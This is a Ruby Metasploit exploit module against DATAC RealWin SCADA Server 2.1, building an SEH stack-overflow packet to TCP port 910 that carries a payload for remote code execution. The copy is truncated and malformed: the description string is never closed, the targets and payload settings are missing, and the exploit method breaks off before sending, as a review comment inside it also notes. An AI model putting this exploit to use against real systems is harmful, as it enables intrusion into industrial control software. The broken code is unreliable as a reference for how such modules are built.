##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# Framework reliability ranking advertised for this module.
Rank = GreatRanking
# TCP client mixin; supplies the `connect` call used in #exploit.
include Msf::Exploit::Remote::Tcp
# SEH mixin; supplies `generate_seh_payload` used in #exploit.
include Msf::Exploit::Remote::Seh
# Registers the module metadata and options.
#
# The description reports the weakness as an unbounded inline memcpy of a
# user-supplied filename reached over TCP port 910, yielding a stack-based
# buffer overflow. The only option registered here is RPORT, defaulting to
# that same port 910.
#
# NOTE(review): in this copy the %q{ description literal is never closed
# before register_options, and the remainder of the update_info hash
# (author, license, references, payload/targets) is not visible -- it looks
# like the middle of this method was dropped during extraction. Confirm
# against the upstream module before relying on anything below.
#
# @param info [Hash] module info merged by update_info (default: {})
def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in DATAC Control International RealWin
SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
packet via port 910, RealWin will try to create a file (which would be saved to
C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
supplied filename with a inline memcpy routine without proper bounds checking, which
results a stack-based buffer overflow, allowing arbitrary remote code execution.
# Default target port; matches the port named in the description above.
register_options([Opt::RPORT(910)], self.class)
end
def exploit
connect
data = [0x67542310].pack('V')
data << [0x00000824].pack('V')
data << [0x00100001].pack('V')
data << [0x00000001].pack('V') #Packet type
data << [0x00060000].pack('V')
data << [0x0000ffff].pack('V')
data << rand_text_alpha_upper(221)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(17706 - payload.encoded.length)
data << [0x451c3500].pack('V')
data << [0x00000154].pack('V')
data << [0x00020040].pack('V')